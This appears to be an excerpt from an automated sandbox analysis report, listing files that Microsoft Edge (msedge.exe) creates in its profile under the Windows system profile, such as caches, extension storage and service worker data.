    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_2
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\519629a3-ef42-45a8-80a4-1ef3c9ab0f55.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF1f9767.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13381052068843973
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9a7e03ce51b814d7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8180e3c3a78ecd22_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0e0de3ce351f8e6b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9626a09b54b19df2_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\d24b740d-fc22-49d9-84be-9b286ce41c73
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000002.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT~RF1f9f17.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\cd2169f8f5a992de_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional Data-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Last Browser
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional Data-wal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_model_and_features_store
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_model_and_features_store\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_model_and_features_store\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data-wal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Download Service
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Ad Blocking
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\4c8cad45-196d-4217-b0ab-447e9c6b9df0.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b82c4dbbc2bbed92_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2e0995500af195c4_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b931fc6ff8856876_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f0e758953c43c4db_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4f7e5db733228f6d_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\99ce8290e829e155_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c9a14d49161c54bd_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fa00e0605e2f2a9a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\355018c0bc478789_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\29c4bbd1bfa0cc63_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b9e5d9eb48353eef_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3a12ecbf3e43ece7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\be495402201abc59_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fd9c59ef6bed1941_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\eac233f365c69025_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\038090926af56b05_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\373dd6c0efd32850_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d8dd7116c41d75e8_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b430a46d5f8b883a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\6038c11eb2cee93f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5f23ac01b3b23511_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\863476f01ea8d40c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fd3acb4df3be7f9b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4409578f8456196c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\709e3b670a25c685_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f15696bde9e1789c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\19ca4fe1ee6a7a2c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f150d03c1d57b5df_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\aa9a6b283c8e83aa_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3d01d920f09c5762_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\493146bb80205982_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8ac78b8dd4cc4cb2_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a6ef69d92350b333_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4a87a79c6d77000a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2318c14047c90430_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\76b3e43e4836f814_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\af8966ab9f9546d2_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\aad64f036172c1d5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fc42d9ea97e88d4a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b14bd987253be535_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3d540aa27e82fa47_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\093e63eb63a8b292_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\86195d14ffd31e2f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\76bd861a9a6f98d5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\15df4f60a8d34ac6_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\QuotaManager
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\2626fa89-4318-493b-8eaf-6cbec6cc6cbc
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\QuotaManager-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\2626fa89-4318-493b-8eaf-6cbec6cc6cbc\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\2626fa89-4318-493b-8eaf-6cbec6cc6cbc\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\2626fa89-4318-493b-8eaf-6cbec6cc6cbc\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\39336937-69b8-44f3-b3c6-2256654e23aa
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\39336937-69b8-44f3-b3c6-2256654e23aa\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt~RF1fa90a.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index
